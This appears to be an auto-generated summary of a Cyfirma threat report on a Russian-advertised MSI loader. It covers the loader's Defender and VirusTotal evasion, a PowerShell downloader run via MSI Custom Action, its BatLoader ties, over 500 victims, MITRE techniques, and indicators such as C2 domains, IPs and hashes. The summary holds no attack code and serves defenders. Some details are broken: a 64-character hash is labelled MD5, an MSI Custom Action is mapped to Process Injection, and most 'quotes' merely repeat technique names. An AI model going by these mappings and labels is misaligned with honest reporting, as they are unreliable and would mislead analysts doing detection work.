Cyfirma researchers uncover a stealthy MSI Loader advertised by a Russian threat actor that evades VirusTotal and Windows Defender, with ties to the BatLoader campaign and use of AnyDesk for concealment. The report details its deployment, cross-border victimology (500+ victims across several countries), and a C2 panel that even allows deleting infected Russian systems, signaling coordinated, multifaceted threat activity.
Keypoints
- The Loader evades both Windows Defender runtime scans and VirusTotal, making detection difficult.
- In examined samples, the loader disguises itself as a .NET Framework setup and uses AnyDesk to conceal deployments.
- Technical patterns and infrastructure show similarities with the BatLoader campaign from March 2023, suggesting coordination.
- The demo panel indicates over 500 compromised victims across the US, UK, Germany, Australia, Korea, Canada, and the Netherlands.
- The loader’s C2 panel includes a capability to delete infected systems in Russia, reflecting underground community practices to protect their own infrastructure.
- The MSI uses Custom Action to run a PowerShell downloader, aided by libraries from Advanced Installer, and pulls payloads from remote URLs.
MITRE Techniques
- [T1055] Process Injection – The threat actor is leveraging the Custom Action feature of the MSI package format to execute the PowerShell script. Quote: “The threat actor is leveraging the Custom Action feature of the MSI package format to execute the PowerShell script.”
- [T1497] Sandbox Evasion – Evades detection by Windows Defender runtime scans and VirusTotal, enabling stealthy operation. Quote: “The Loader’s evasion capabilities extend to both Windows Defender runtime scans and VT scans, allowing it to avoid detection effectively.”
- [T1012] Query Registry – Discovery-related activity noted as part of system reconnaissance. Quote: “Query Registry.”
- [T1057] Process Discovery – Discovery of running processes as part of environment enumeration. Quote: “Process Discovery.”
- [T1082] System Information Discovery – Collecting information about the host system. Quote: “System Information Discovery.”
- [T1083] File and Directory Discovery – Locating files and directories as part of the attack footprint. Quote: “File and Directory Discovery.”
- [T1124] System Time Discovery – Determining system time to coordinate actions. Quote: “System Time Discovery.”
- [T1105] Remote File Copy – The loader downloads payloads from remote servers, enabling staged delivery. Quote: “Remote File Copy.”
- [T1533] Data from Local System – Exfiltration or collection of data from the host. Quote: “Data from Local System.”
- [T1485] Data Destruction – Capabilities to destroy data as part of impact. Quote: “Data Destruction.”
- [T1106] Execution through API – Execution via API calls, including PowerShell execution via MSI Custom Action. Quote: “Execution through API.”
Indicators of Compromise
- [Domain] panelnew.ru, midj-ai.store – Domains used for command-and-control
- [URL] https://midj-ai.store/install.php, https://midj-ai.store/start.php – C2 URLs
- [Loader] 0d2d40a2b4842722dab9c4a5fd160ea0c88503508548a9a55e02e58160475388 – MD5 hash of the loader sample
- [Loader] aa8eff63835e5d1172d0a84bfd7703c5ac1c4ee63e6e0b5d700ea8c5e3814ca0 – SHA-256 hash of the loader sample
- [IP] 195.161.62.30, 81.177.165.87, 81.177.135.244 – Contacted IP addresses used in infrastructure